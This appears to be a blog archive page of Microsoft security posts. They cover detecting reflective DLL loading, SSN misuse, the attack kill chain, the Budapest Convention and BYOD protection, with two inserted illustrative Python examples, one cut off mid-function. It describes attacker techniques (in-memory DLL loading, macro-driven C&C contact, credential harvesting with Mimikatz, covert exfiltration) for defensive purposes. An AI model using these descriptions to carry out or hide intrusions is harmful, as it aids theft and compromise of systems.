Today’s attacks put emphasis on leaving little, if any, forensic evidence to maintain stealth and achieve persistence. Attackers use methods that allow exploits to stay resident within an exploited process or migrate to a long-lived process without ever creating or relying on a file on disk. In recent blogs we described how attackers use basic cross-process migration or advanced techniques like atom bombing and process hollowing to avoid detection.

Reflective Dynamic-Link Library (DLL) loading, which loads a DLL into process memory without using the Windows loader, is another method used by attackers.

In-memory DLL loading was first described in 2004 by Skape and JT, who illustrated how one can patch the Windows loader to load DLLs from memory instead of from disk. In 2008, Stephen Fewer of Harmony Security introduced the reflective DLL loading process that loads a DLL into a process without being registered with the process. Modern attacks now use this technique to avoid detection.

Reflective DLL loading isn't trivial: it requires writing the DLL into memory and then resolving its imports and/or relocating it. To reflectively load a DLL, one needs to author one's own custom loader.

However, attackers are still motivated to not use the Windows loader, as most legitimate applications would, for two reasons:

  1. Unlike when using the Windows loader (which is invoked by calling the LoadLibrary function), reflectively loading a DLL doesn't require the DLL to reside on disk. As such, an attacker can exploit a process, map the DLL into memory, and then reflectively load the DLL without first saving it to disk.
  2. Because it's not saved on disk, a library that is loaded this way may not be readily visible without forensic analysis (e.g., inspecting whether executable memory has content resembling executable code).

Instrumentation and detection

A crucial aspect of reflectively loading a DLL is to have executable memory available for the DLL code. This can be accomplished by taking existing memory and changing its protection flags or by allocating new executable memory. Memory procured for DLL code is the primary signal we use to identify reflective DLL loading.

In Windows 10 Creators Update, we instrumented function calls related to procuring executable memory, namely VirtualAlloc and VirtualProtect, which generate signals for Windows Defender Advanced Threat Protection (Windows Defender ATP). Based on this instrumentation, we've built a model that detects reflective DLL loading in a broad range of high-risk processes, for example, browsers and productivity software.

The model takes a two-pronged approach, as illustrated in Figure 1:

  1. First, the model learns about the normal allocations of a process. As a simplified example, we observe that a process like Winword.exe allocates page-aligned executable memory of size 4,000 and particular execution characteristics. Only a select few threads within the Winword process allocate memory in this way.
  2. Second, we find that a process associated with malicious activity (e.g., executing a malicious macro or exploit) allocates executable memory that deviates from the normal behavior.

Figure 1. Memory allocations observed by a process running normally vs. allocations observed during malicious activity

This model shows that we can use memory events as the primary signal for detecting reflective DLL loading. In our real model, we incorporate a broad set of other features, such as allocation size, allocation history, thread information, allocation flags, etc. We also consider the fact that application behavior varies greatly because of other factors like plugins, so we add other behavioral signals like network connection behavior to increase the effectiveness of our detection.
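A simplified version of the two-pronged approach just described, as an added example (not Microsoft's model or code): a per-process baseline is learned from VirtualAlloc/VirtualProtect events seen while the process runs normally, and later executable allocations are scored against it, including the footprint of a reflectively loaded DLL (a large private RWX region with no image file behind it). The event schema, sizes, thread ids and paths are constructed for the example.

```python
"""Baseline-and-deviate detection of suspicious executable-memory allocations.

Added example, not Microsoft's model or code. It mirrors the two-pronged
approach described above: learn what executable allocations look like while a
process runs normally, then flag allocations that deviate, including the
footprint of a reflectively loaded DLL (a large private RWX region with no
image file behind it). Every event, size, thread id and path is constructed.
"""
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

PAGE_SIZE = 0x1000
PAGE_EXECUTE_READ = 0x20          # Windows page-protection constants (subset)
PAGE_EXECUTE_READWRITE = 0x40
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}   # the PAGE_EXECUTE* family
MEM_PRIVATE = 0x20000             # region types as reported by VirtualQuery
MEM_IMAGE = 0x1000000


@dataclass(frozen=True)
class AllocEvent:
    """One instrumented VirtualAlloc/VirtualProtect call (constructed schema)."""
    process: str
    thread_id: int
    api: str                 # "VirtualAlloc" or "VirtualProtect"
    size: int                # bytes affected
    protect: int             # resulting page protection
    mem_type: int            # MEM_PRIVATE, MEM_IMAGE, ...
    backing_path: Optional[str] = None   # image file for MEM_IMAGE regions


def size_bucket(size: int) -> int:
    """Coarse size class: bit length of the page count (1 page -> 1, 96 pages -> 7)."""
    pages = max(1, (size + PAGE_SIZE - 1) // PAGE_SIZE)
    return pages.bit_length()


class ExecMemBaseline:
    """Per-process profile of executable allocations seen during normal use."""

    def __init__(self, process: str):
        self.process = process
        self.size_buckets: Counter = Counter()
        self.threads: set = set()

    def learn(self, event: AllocEvent) -> None:
        if event.process == self.process and event.protect in EXECUTABLE:
            self.size_buckets[size_bucket(event.size)] += 1
            self.threads.add(event.thread_id)

    def deviations(self, event: AllocEvent) -> List[str]:
        """Ways an executable allocation fails to match the learned profile."""
        if event.process != self.process or event.protect not in EXECUTABLE:
            return []
        reasons = []
        if (event.mem_type == MEM_PRIVATE and event.backing_path is None
                and event.protect == PAGE_EXECUTE_READWRITE):
            reasons.append("private RWX region with no backing image")
        if self.size_buckets[size_bucket(event.size)] == 0:
            reasons.append("size class never seen in baseline")
        if event.thread_id not in self.threads:
            reasons.append("thread never allocated executable memory before")
        return reasons


def detect(baseline: ExecMemBaseline, events,
           min_reasons: int = 2) -> List[Tuple[AllocEvent, List[str]]]:
    """Return (event, reasons) pairs for events deviating in at least min_reasons ways.

    Requiring more than one deviation tolerates benign variation such as a
    plugin allocating from a thread the baseline has not seen."""
    hits = []
    for event in events:
        reasons = baseline.deviations(event)
        if len(reasons) >= min_reasons:
            hits.append((event, reasons))
    return hits


# Constructed baseline: Winword.exe normally allocates small page-aligned
# executable regions from a couple of dedicated threads.
NORMAL_EVENTS = [
    AllocEvent("Winword.exe", 1180, "VirtualAlloc", 4000, PAGE_EXECUTE_READ, MEM_PRIVATE),
    AllocEvent("Winword.exe", 1180, "VirtualAlloc", 4000, PAGE_EXECUTE_READ, MEM_PRIVATE),
    AllocEvent("Winword.exe", 1184, "VirtualProtect", 8192, PAGE_EXECUTE_READ, MEM_IMAGE,
               r"C:\Program Files\Microsoft Office\root\Office16\WWLIB.DLL"),
]
# Constructed events after a malicious macro runs: a new thread carves out a
# large RWX private region to hold a DLL fetched over the network.
SUSPECT_EVENTS = [
    AllocEvent("Winword.exe", 1180, "VirtualAlloc", 4000, PAGE_EXECUTE_READ, MEM_PRIVATE),
    AllocEvent("Winword.exe", 2300, "VirtualAlloc", 0x60000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE),
    AllocEvent("Winword.exe", 2300, "VirtualProtect", 0x5A000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE),
]


def run_demo():
    """Learn from the normal events, then score the suspect ones."""
    baseline = ExecMemBaseline("Winword.exe")
    for event in NORMAL_EVENTS:
        baseline.learn(event)
    return detect(baseline, SUSPECT_EVENTS)


if __name__ == "__main__":
    for event, reasons in run_demo():
        print(f"ALERT tid={event.thread_id} {event.api} size=0x{event.size:x}: {'; '.join(reasons)}")
```

The real model described above adds further features (allocation history, flags, network behaviour); this block only shows the baseline-versus-deviation mechanism on the size, thread and region-type signals.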

Detecting reflective DLL Loading

Let's show how Windows Defender ATP can detect reflective DLL loading used with a common technique in modern threats: social engineering. In this attack, the target victim opens a Microsoft Word document from a file share. The victim is tricked into running a macro like the code shown in Figure 2. (Note: A variety of mechanisms allow customers to mitigate this kind of attack at the onset; in addition, several upcoming Office security features further protect from this attack.)

Figure 2. Malicious macro

When the macro code runs, the Microsoft Word process reaches out to the command-and-control (C&C) server specified by the attacker, and receives the content of the DLL to be reflectively loaded. Once the DLL is reflectively loaded, it connects to the C&C and provides command line access to the victim machine.

Note that the DLL is not part of the original document and does not ever touch the disk. Other than the initial document with the small macro snippet, the rest of the attack happens in memory. Memory forensics reveals that there are several larger RWX sections mapped into the Microsoft Word process without a corresponding DLL, as shown in Figure 3. These are the memory sections where the reflectively loaded DLL resides.

Figure 3. Large RWX memory sections in Microsoft Word process upon opening malicious document and executing malicious macro

Windows Defender ATP identifies the memory allocations as abnormal and raises an alert, as shown in Figure 4. The alert provides context on the document, along with information on command-and-control communication, which allows security operations personnel to assess the scope of the attack and start containing the breach.

Figure 4. Example alert on WDATP

Microsoft Office 365 Advanced Threat Protection protects customers against similar attacks using dynamic behavior matching. In attacks like this, SecOps personnel would see an Office 365 ATP behavioral detection like that shown in Figure 5 in Office 365's Threat Explorer page.

Figure 5. Example Office 365 ATP detection

Conclusion: Windows Defender ATP uncovers in-memory attacks

Windows 10 continues to strengthen defense capabilities against the full range of modern attacks. In this blog post, we illustrated how Windows Defender ATP detects the reflective DLL loading technique. Security operations personnel can use the alerts in Windows Defender ATP to quickly identify and respond to attacks in corporate networks.

Windows Defender ATP is a post-breach solution that alerts SecOps personnel about hostile activity. It uses rich security data, advanced behavioral analytics, and machine learning to detect the invariant techniques used in attacks. Enhanced instrumentation and detection capabilities in Windows Defender ATP can better expose covert attacks.

Windows Defender ATP also provides detailed event timelines and other contextual information that SecOps teams can use to understand attacks and quickly respond. The improved functionality in Windows Defender ATP enables them to isolate the victim machine and protect the rest of the network.

For more information about Windows Defender ATP, check out its features and capabilities and read about why a post-breach detection approach is a key component of any enterprise security strategy. Windows Defender ATP is built into the core of Windows 10 Enterprise and can be evaluated free of charge.

 

Christian Seifert

Windows Defender ATP Research


SSN for authentication is all wrong

October 23rd, 2017

Unless you were stranded on a deserted island or participating in a zen digital fast, chances are you've heard plenty about the massive Equifax breach and the head-rolling fallout. In the flurry of headlines and advice about credit freezes, an important part of the conversation was lost: if we didn't misuse our social security numbers, losing them wouldn't be a big deal. Let me explain: most people, and that mainly includes some pretty high-up identity experts that I've met in my travels, don't understand the difference between identification and verification. In the real world, conflating those two points doesn't often have dire consequences. In the digital world, it's a huge mistake that can lead to severe impacts.

Isn't it all just authentication, you may ask? Well, yes, identification and verification are both parts of the authentication whole, but failure to understand the differences is where the mess comes in. However, one reason it's so hard for many of us to separate identification and verification is that historically we haven't had to. Think back to how humans authenticated to each other before the ability to travel long distances came into the picture. Our circle of acquaintances was pretty small and we knew each other by sight and sound. Just by looking at your neighbor, Bob, you could authenticate him. If you met a stranger, chances are someone else in the village knew the stranger and could vouch for her.

The ability to travel long distances changed the equation a bit. We developed documents that provided verification during the initiation phase (for example, when you have to bring a birth certificate to the DMV to get your initial driver's license) and ongoing identification, like a unique ID and a photo. These documents served as a single identification and verification mechanism. And that was great! It worked fine for years, until the digital age.

The digital age changed the model because rather than one person holding a single license with their photo on it, we had billions of people trying to authenticate to billions of systems with simple credentials like user name and password. And no friendly local villager to vouch for us.

Who are you? Prove it!

This is where the difference between the two really starts to matter. Identification answers the question: Who are you? Your name is an identifier. It could also be an alias, such as your unique employee ID number.

Do you want your name to be private? Imagine meeting another parent at your kid's soccer game and refusing to tell them your name for security reasons. How about: "Oh, your new puppy is so adorable, what's her name?" And you respond, "If I told you, I'd have to kill you." Or you try to find an address in a town with no street signs because the town is super security conscious. Ridiculous, right? Identifiers are public specifically so we can share them to help identify things.

We also want consistency in our identifiers. Imagine if that town had street signs, but changed the names of the streets every 24 hours for security reasons. And uniqueness: if every street had the same name, you'd still have a heck of a time finding the right address, wouldn't you?

Now that we're clear on what the identifier is, we can enumerate a few aspects that make up a really good one:

  • Public
  • Unchanging
  • Unique

In a town or on a public road, we have a level of trust that the street sign is correct because the local authorities have governance over road signs. Back in our village, we trust Bob is Bob because we can verify him ourselves. But in the digital world, things get pretty tricky: how do you verify someone or something you've never met before? Ask them to prove it!

We use these two aspects of authentication almost daily when we log into systems with a user ID (identification) and password (verification). How we verify in the real world can be public, unchanging, and unique because it's very hard to forge a whole person, or to switch all the street signs in a town. But verification online is trickier. We need to be able to provide verification of who we are to a number of entities, many of whom aren't great at protecting data. And if the same verification is re-used across entities, and one loses it, attackers could gain access to every site where it was used. This is why experts strongly recommend using unique passwords for every website/app. This goes for those challenge questions too, which can lead to some fun calls with customer service: "Oh, the town where I was born? It's: xja*21njaJK)`jjAQ^." At this point in time our father's middle name, first pet's name, town where we were born, school we went to, and address history should be assumed public; using them as secrets for verification doesn't make sense anymore.

If one site loses your digital verification info, no worries. You only used it for that site and can create new info for the next one. What if you couldnt change your password ever? It was permanent and also got lost during the Yahoo! breach? And it was the one you use at your bank, and for your college and car loans, and your health insurance? How would you feel?

So, with that in mind, you'd probably agree that the best digital verifiers are:

  • Private
  • Easily changed
  • Unique

Your turn

OK, now that you know the difference between identification and verification and the challenges of verification in a digital world, what do you think – Is your SSN a better identifier or verifier?


Cybersecurity’s perfect storm

The unprecedented scale and sophistication of modern cyberthreats, combined with the rapidly disappearing IT perimeter, means that while preventing an attack from becoming a breach is ideal, it is no longer realistic.

Microsoft proactively monitors the threat landscape for those emerging threats, to help better protect our customers. This involves observing, across billions of machines, the activities of targeted activity groups, which are often the first ones to introduce new exploits and techniques that are later used by other attackers.

So how can organizations defend against this triple threat?

Organizations need an approach to security that looks holistically across all critical endpoints, at all stages of a breach—before, during, and after. This means having tools that can not only protect against compromise, but can also detect the early signs of a breach and respond rapidly before it can cause damage to your system.

Windows Defender Advanced Threat Protection is a new post-breach security layer, designed to reduce the time it takes to detect, investigate and respond to advanced attacks. This post-breach layer assumes breach and is designed to complement prevention technologies in the Windows 10 security stack, such as Windows Defender Antivirus, SmartScreen, and various other OS hardening features.

By leveraging a combination of deep behavioral sensors, coupled with powerful cloud security analytics, Windows Defender ATP offers unparalleled detection, investigation and response experience. It uses behavioral analytics proven to detect unknown attacks and security data from over 1B machines to establish what’s normal. This is then coupled with support from our own industry leading hunters. Recordings of activity across all endpoints in the last 6 months allow users to go back in time to understand what happened.

Windows 10 has the protection you need, built-in

Windows Defender ATP is built into Windows 10 and provides a comprehensive post-breach solution to help security teams identify suspicious threats on your network that pre-breach solutions might miss.

Windows 10 and Windows Defender Advanced Threat Protection give you the future of cybersecurity NOW. Find out more at Microsoft Secure.


Microsoft Security Intelligence Report Volume 21 is now available

The latest volume of the Microsoft Security Intelligence Report is now available for free download at www.microsoft.com/sir.

This new volume of the report includes threat data from the first half of 2016 as well as longer term trend data on industry vulnerabilities, exploits, malware, and malicious websites. The report also provides specific threat data for over 100 countries/regions.

Our Featured Intelligence content for this volume of the report includes three deep dive sections:

Protecting cloud infrastructure; detecting and mitigating threats using Azure Security Center:
As organizations move workloads to cloud-based services it is important that security teams keep abreast of changes in their threat posture. New threats can be encountered when adopting solutions that are fully cloud based, or when connecting on-premises environments to cloud services. This section of the report details common threats that organizations may encounter, and explains how security teams can use Azure Security Center to protect, detect, and respond to security threats against Azure cloud-based resources.

PROMETHIUM and NEODYMIUM: parallel zero-day attacks targeting individuals in Europe:
Microsoft proactively monitors the threat landscape for emerging threats, including observing the activities of targeted activity groups. The new report chronicles two activity groups, code-named PROMETHIUM and NEODYMIUM, both of which target individuals in a specific area of Europe. Both attack groups launched attack campaigns in May 2016 using the same zero-day exploit to seek information about specific individuals. Microsoft is sharing information about these groups to raise awareness of their activities, and to help individuals and organizations implement existing mitigation options that significantly reduce risk from these attack groups and other similar groups.

Ten years of exploits: a long-term study of exploitation of vulnerabilities in Microsoft software:
Microsoft researchers conducted a study of security vulnerabilities and the exploitation of the most severe vulnerabilities in Microsoft software over a 10-year period ending in 2015. In the past five years vulnerability disclosures have increased across the entire industry. However, the number of remote code execution (RCE) and elevation of privilege (EOP) vulnerabilities in Microsoft software has declined significantly. The results of the study suggest that while the risk posed by vulnerabilities appeared to increase in recent years, the actualized risk of exploited vulnerabilities in Microsoft software has steadily declined.

There is a lot of other new data in this report that I hope you’ll find useful.

You can download Volume 21 of the Microsoft Security Intelligence Report at www.microsoft.com/sir.

Ken Malcolmson
Executive Security Advisor, Microsoft Enterprise Cybersecurity Group

Security in agile development

This post is authored by Talhah Mir, Principal PM Manager, WWIT CP ISRM ACE

Most enterprises’ security strategies today are multifaceted – encompassing securing a variety of elements of their IT environment including identities, applications, data, devices, and infrastructure. This also includes driving or supporting security training and changes in culture and behavior for a more secure enterprise. But, security really starts at the fundamental core, at the software development level. It’s here that security can be “built in” to ensure that applications meet the security requirements of enterprises today and are aligned to a holistic, end to end security strategy.

We recently published a white paper titled "Security for Modern Engineering," which outlines some of the security best practices and learnings we have had on our journey to support modern engineering. Software engineering teams everywhere are trying to achieve greater effectiveness and efficiency as they face climbing competitive pressures for differentiation and constantly evolving customer demands. This is driving the need for significantly shorter time-to-market schedules that don't compromise on the quality of software applications and services. To address this demand, modern engineering teams, like those in Microsoft IT, are adopting agile development methodologies, embracing DevOps (a merging of development and operations), and maintaining development infrastructure that supports continuous integration/continuous delivery. Today, a more secure application can be a differentiator, as users of applications are becoming more aware of and concerned about security.

There has never been a better time to push security automation and develop integrated security services for engineering teams as they think about operating in a modern engineering environment. Similar to how development, test, and operation roles have merged to shape today’s modern engineer, we, at Microsoft, continue to believe that a software security assurance program can yield much better results if the processes are baked seamlessly into the engineering process. This is what we advocated with the development of Microsoft Security Development Lifecycle (SDL) which to this day, continues to be a priority for a modern engineering practice. Security teams should leverage the momentum of automation to further enhance the security posture of their line-of-business application portfolio within their organization – helping to drive an effective, efficient, and competitive business.


Disrupting the kill chain

This post is authored by Jonathan Trull, Worldwide Executive Cybersecurity Advisor, Enterprise Cybersecurity Group.

The cyber kill chain describes the typical workflow, including techniques, tactics, and procedures or TTPs, used by attackers to infiltrate an organization’s networks and systems.  The Microsoft Global Incident Response and Recovery (GIRR) Team and Enterprise Threat Detection Service, Microsoft’s managed cyber threat detection service, identify and respond to thousands of targeted attacks per year.  Based on our experience, the image below illustrates how most targeted cyber intrusions occur today.

(Image: attack kill chain)

The initial attack typically includes the following steps:

  • External recon –  During this stage, the attacker typically searches publicly available sources to identify as much information as possible about their target.  This will include information about the target’s IP address range, business operations and supply chain, employees, executives, and technology utilized.  The goal of this stage is to develop sufficient intelligence to increase the chances of a successful attack. If the attacker has previously penetrated your environment, they may also refer to intelligence gathered during previous incursions.
  • Compromised machine – Attackers continue to use socially engineered attacks to gain an initial foothold on their victim’s network.  Why?  Because these attacks, especially if targeted and based on good intelligence, have an extremely high rate of success.  At this stage, the attacker will send a targeted phishing email to a carefully selected employee within the organization.  The email will either contain a malicious attachment or a link directing the recipient to a watering hole.  Once the user executes the attachment or visits the watering hole, another malicious tool known as a backdoor will be installed on the victim’s computer giving the attacker remote control of the computer.
  • Internal Recon and Lateral Movement – Now that the attacker has a foothold within the organization’s network, he or she will begin gathering information not previously available externally.  This will include performing host discovery scans, mapping internal networks and systems, and attempting to mount network shares.  The attacker will also begin using freely available, yet extremely effective tools, like Mimikatz and WCE to harvest credentials stored locally on the initially compromised machine and begin planning the next stage of the attack as shown below.

(Image: high-privileges lateral movement cycle)

  • Domain Dominance – At this stage, the attacker will attempt to elevate their level of access to a higher trusted status within the network.  The attacker's ultimate goal is to access your data, and the privileged credentials of a domain administrator offer them many ways to access your valuable data stores.  Once this occurs, the attacker will begin to pivot throughout the network, either looking for valuable data or installing ransomware for future extortion attempts, or both.
  • Data Consolidation and Exfiltration – Now that the attacker has access to the valuable data within the organization’s systems, he or she must consolidate it, package it up, and send it out of the network without being detected or blocked.  This is typically accomplished by encrypting the data and transferring it to an external system controlled by the attacker using approved network protocols like DNS, FTP, and SFTP or Internet-based file transfer solutions.

Microsoft Secure and Productive Enterprise

The Microsoft Secure and Productive Enterprise is a suite of product offerings that have been purposely built to disrupt this cyber attack kill chain while still ensuring an organization’s employees remain productive.  Below, I briefly describe how each of these technologies disrupts the kill chain:

  • Office 365 Advanced Threat Protection – This technology is designed to disrupt the "initial compromise" stage and raise the cost of successfully using phishing attacks.
    Most attackers leverage phishing emails containing malicious attachments or links pointing to watering hole sites. Advanced Threat Protection (ATP) in Office 365 provides protection against both known and unknown malware and viruses in email, provides real-time (time-of-click) protection against malicious URLs, as well as enhanced reporting and trace capabilities.  Messages and attachments are not only scanned against signatures powered by multiple antimalware engines and intelligence from Microsoft’s Intelligent Security Graph, but are also routed to a special detonation chamber, run, and the results analyzed with machine learning and advanced analysis techniques for signs of malicious behavior to detect and block threats. Enhanced reporting capabilities also make it possible for security teams to quickly identify and respond to email based attacks when they occur.
  • Windows 10 –  This technology disrupts the compromised machine and lateral movement stages by raising the difficulty of successfully compromising and retaining control of a user’s PC and by protecting the accounts and credentials stored and used on the device.
    If an attacker still manages to deliver malware through to one of the organization’s employees by some other mechanism (e.g., via personal email), Windows 10’s security features are designed to both stop the initial infection, and if infected, prevent further lateral movement. Specifically, Windows Defender Application Guard uses new, hardware based virtualization technology to wrap a protective border around the Edge browser.  Even if malware executes within the browser, it cannot access the underlying operating system and is cleaned from the machine once the browser is closed.  Windows Device Guard provides an extra layer of protection to ensure that only trusted programs are loaded and run preventing the execution of malicious programs, and Windows Credential Guard uses the same hardware based virtualization technology discussed earlier to prevent attackers who manage to gain an initial foothold from obtaining other credentials stored on the endpoint.  And finally, Windows Defender Advanced Threat Protection is the DVR for your company’s security team.  It provides a near real-time recording of everything occurring on your endpoints and uses built-in signatures, machine learning, deep file analysis through detonation as a service, and the power of the Microsoft Intelligent Security Graph to detect threats.  It also provides security teams with remote access to critical forensic data needed to investigate complex attacks.
  • Microsoft Advanced Threat Analytics – This technology disrupts the lateral movement phase by detecting lateral movement attack techniques early, allowing for rapid response.
    If an attacker still manages to get through the above defenses, compromise credentials, and moves laterally, the Microsoft Advanced Threat Analytics (ATA) solution provides a robust set of capabilities to detect this stage of an attack.  ATA uses both detection of known attack techniques as well as a user-based analytics that learns what is “normal” for your environment so it can spot anomalies that indicate an attack. Microsoft ATA can detect internal recon attempts such as DNS enumeration, use of compromised credentials like access attempts during abnormal times, lateral movement (Pass-the-Ticket, Pass-the-Hash, etc.), privilege escalation (forged PAC), and domain dominance activities (skeleton key malware, golden tickets, remote execution).
  • Azure Security Center – While Microsoft ATA detects cyber attacks occurring within an organization’s data centers, Azure Security Center extends this level of protection into the cloud.

And now for the best part.  As shown in the image below, each of the above listed technologies is designed to work seamlessly together and provide security teams with visibility across the entire kill chain.

(Image: disrupting the kill chain)

Each of these technologies also leverages the power of the Microsoft Intelligent Security Graph, which includes cyber threat intelligence collected from Microsoft's products and services, to provide the most comprehensive and accurate detections.

  • Cloud App Security, Intune, Azure Information Protection, and Windows 10 Information Protection – And finally, the Microsoft Secure and Productive Enterprise Suite provides significant capabilities to classify and protect data and prevent its loss.  Among other capabilities, Microsoft Cloud App Security can identify and control the use of unsanctioned cloud applications.  This helps organizations prevent data loss, whether from an attack or rogue employee, via cloud-based applications.  Intune and Windows 10 Information Protection prevent corporate data from being intermingled with personal data or used by unsanctioned applications whether on a Windows 10 device or on iOS or Android based mobile devices.  And finally, Azure Information Protection provides organizations and their employees with the ability to classify and protect data using digital rights management technology.  Organizations can now implement and enforce a need-to-know strategy thereby significantly reducing the amount of unencrypted data available should an attacker gain access to their network.

Finally, Microsoft’s Enterprise Cybersecurity Group (ECG) also offers a range of proactive and reactive services that leverage the capabilities of the Secure and Productive Enterprise suite, in combination with the Intelligent Security Graph, to help companies detect, respond to, and recover from attacks.

In the coming weeks, I will be following up with blogs and demos that go deeper into each of the technologies listed above and discuss how companies can most effectively integrate these solutions into their security strategies, operations, and existing technologies. To learn more about Microsoft technologies visit Microsoft Secure.

Categories: Cloud Computing, cybersecurity

The Budapest Convention on Cybercrime – 15th Anniversary

This post was authored by Gene Burrus, Assistant General Counsel

November 2016 marks the 15th anniversary of the Convention on Cybercrime of the Council of Europe, commonly referred to as the Budapest Convention.

The treaty is the preeminent binding international instrument in the area of cybercrime. It serves as a guideline for countries developing national legislation and provides a framework for international cooperation between countries’ law enforcement agencies, so critical to cybercrime investigation and prosecution.

Since its inception, 50 countries have recognized this by acceding to it; a further six have signed it, and 12 more have been invited to do so. Its influence extends far beyond those countries, with a number of international organizations participating in the Convention Committee and many other countries looking to it for best practices.

The Budapest Convention’s success lies in part in the fact that it has not stood still. As technology has evolved, the Convention’s members have sought to adopt a set of recommendations to make mutual legal assistance requests more efficient, and have begun to investigate whether its premises still hold under the new paradigm of cloud computing.

The importance of this to Microsoft and its customers is large and increasing. Estimates of global financial losses from cybercrime exceed $400 billion a year, and that number understates the less tangible impacts on privacy, trust, innovation and the adoption of new technologies. Effectively fighting cybercrime is therefore of critical importance to Microsoft’s business.

In addition, detecting and investigating cybercrime often involves private technology providers like Microsoft, and partnerships between Microsoft and law enforcement. Advancing the objectives of the Budapest Convention, a common harmonized set of criminal prohibitions and facilitated international cooperation, directly benefits our customers. Greater harmonization among national approaches to criminalizing behavior, criminal procedure and investigative capabilities is critical to helping companies like Microsoft comply with what might otherwise be conflicting legal obligations under different legal regimes.

The Convention’s main objectives are two-fold: to drive a common harmonized set of criminal prohibitions, and to facilitate international cooperation. Both matter to Microsoft when it is looking to help protect customers. The first step in fighting cybercrime is often ensuring that the country where a perpetrator lives actually has laws against cybercrime; absent this, a perpetrator can act with impunity from a so-called safe haven. The Convention defines a number of different types of crimes that can be committed online, providing a common frame of reference for its members, including:

  • Hacking crimes involving unlawfully accessing, intercepting or interfering with computers and computer networks;
  • Computer related fraud crimes;
  • Content related crimes, such as child pornography.

Secondly, the Convention aims to provide for criminal procedure necessary to investigate and prosecute cybercrimes, and to set up a fast, efficient, effective regime for cooperation between law enforcement in different nations. The latter is critical for Microsoft to help protect its customers. By its very nature cybercrime is almost always international in its scope. Perpetrators sitting in one country often attack victims in other countries, frequently using servers and networks sitting in yet others. Therefore, there must be procedures and mechanisms in place to facilitate and enable cooperation between and among the countries where the victims, the perpetrators, and the computer systems are physically located.

Finally, and outside the scope or powers of the Budapest Convention, there remains the practical problem of motivating a country that houses a perpetrator, but may itself have few nationals among the victims, to spend resources addressing that crime. That will continue to be easier said than done until all countries come to realize that trust in the online environment is mutually beneficial and difficult to maintain. A lack of trust will impact all online economies, no matter where the criminals come from.

On its 15th birthday, the Budapest Convention stands as the gold standard of international conventions in the area of cybercrime. It is a critical tool in our efforts to help protect and secure our products and our customers against cybercriminals. We hope that in the coming years more countries join it in an effort to eradicate the most modern of crimes.

Categories: cybersecurity

Securing the new BYOD frontline: Mobile apps and data

With personal smartphones, tablets, and laptops becoming ubiquitous in the workplace, bring your own device (BYOD) strategies and security measures have evolved. The frontlines have shifted from the devices themselves to the apps and data residing on—or accessed through—them.

Mobile devices and cloud-based apps have undeniably transformed the way businesses operate. But they also introduce new security and compliance risks that must be understood and mitigated. When personal and corporate apps are intermingled on the same device, how can organizations remain compliant and protected while giving employees the best productivity experience? And when corporate information is dispersed among disparate, often unmanaged locations, how can organizations make sure sensitive data is always secured?

Traditional perimeter solutions have proved to be inadequate in keeping up with the stream of new apps available to users. And newer point solutions either require multiple vendors or are just too complex and time-consuming for IT teams to implement. Companies need a comprehensive, integrated method for protecting information—regardless of where it is stored, how it is accessed, or with whom it is shared.

Microsoft’s end-to-end information protection solutions can help reconcile the disparity between user productivity and enterprise compliance and protection. Our identity and access management solutions integrate with existing infrastructure systems to protect access to applications and resources across corporate data centers and in the cloud.

The following Microsoft solutions and technologies provide access control on several levels, offering broad coverage that can be deployed quickly:

Identity and access management

Simplify user access with identity-based single sign-on (SSO). Azure Active Directory Premium (Azure AD) syncs with existing on-premises directories to simplify access to any application, including those in the cloud, with a secured, unified identity. No more juggling multiple combinations of user names and passwords: users sign in once with an authenticated corporate ID and receive a token that grants access to resources for as long as the token is valid. Azure AD comes pre-integrated with thousands of popular SaaS apps and works with iOS, Android, and Windows devices to deliver multi-platform access. Not only does unified identity with SSO simplify user access, it can also reduce the overhead costs associated with operating and maintaining multiple user accounts.

Secure and compliant mobile devices

Microsoft Intune manages and protects devices, corporate apps, and data on almost any personal or corporate-owned device. Through Intune mobile device management (MDM) capabilities, IT teams can create and define compliance policies to meet specific business requirements, deploy policies to users or devices, and monitor device and user compliance from a single administration console. Intune compliance policies deliver visibility into the health of users’ devices and enable IT to block or restrict access if a device becomes non-compliant. IT administrators can also perform remote actions, such as passcode reset, device lock, data encryption, or a full wipe of a lost, stolen, or non-compliant device.

Conditional access

Microsoft Intune can also reinforce access protection by verifying user and device state before granting access, through conditional access policies. Intune policies evaluate factors such as the client’s IP range, the user’s group membership, and whether the device is managed by Intune and compliant with the policies administrators have set. If the device fails these checks, Intune blocks the user’s access until the device is encrypted, a passcode is set, and the device is no longer jailbroken or rooted. Intune integrates with cloud services like Office 365 and Exchange to confirm device health and grant access based on the result.

Multi-factor authentication

Multi-factor authentication is a feature built into Azure Active Directory that adds a second layer of authentication to help ensure only the right people have the right access to corporate applications. It prevents unauthorized access to on-premises and cloud apps by requiring an additional authentication factor, and offers flexible enforcement based on user, device, or app to reduce compliance risk.
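The conditional access and multi-factor authentication sections above describe one decision: for a given sign-in, combine device health, network location and group membership under the applicable policies and arrive at grant, step-up to MFA, or block. The following is an added example of that evaluation logic, written for this page and not Intune’s or Azure AD’s own code. The policy fields, the compliance checks (enrolled, compliant, encrypted, passcode, not jailbroken or rooted), the trusted network ranges, the accounts and the sample sign-ins are all constructed assumptions; the one behaviour deliberately copied from the text is that a non-compliant device is blocked outright rather than merely prompted for MFA.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple
import ipaddress


@dataclass
class Device:
    managed: bool        # enrolled in MDM
    compliant: bool      # MDM reports the device meets its compliance policy
    encrypted: bool
    passcode_set: bool
    jailbroken: bool     # jailbroken (iOS) or rooted (Android)


@dataclass
class SignIn:
    user: str
    groups: Set[str]
    client_ip: str
    app: str
    device: Device


@dataclass
class Policy:
    name: str
    apps: Set[str]                                             # apps the policy covers
    user_groups: Optional[Set[str]] = None                     # None means every user
    trusted_networks: List[str] = field(default_factory=list)  # CIDR strings
    require_compliant_device: bool = False
    require_mfa_off_network: bool = False


def device_failures(d: Device) -> List[str]:
    """Every reason the device would be considered non-compliant (empty list = compliant)."""
    failures = []
    if not d.managed:
        failures.append("device not enrolled in MDM")
    if not d.compliant:
        failures.append("device reported non-compliant")
    if not d.encrypted:
        failures.append("storage not encrypted")
    if not d.passcode_set:
        failures.append("no passcode set")
    if d.jailbroken:
        failures.append("device is jailbroken or rooted")
    return failures


def on_trusted_network(ip: str, cidrs: List[str]) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparsable client address: treat as untrusted (fail closed)
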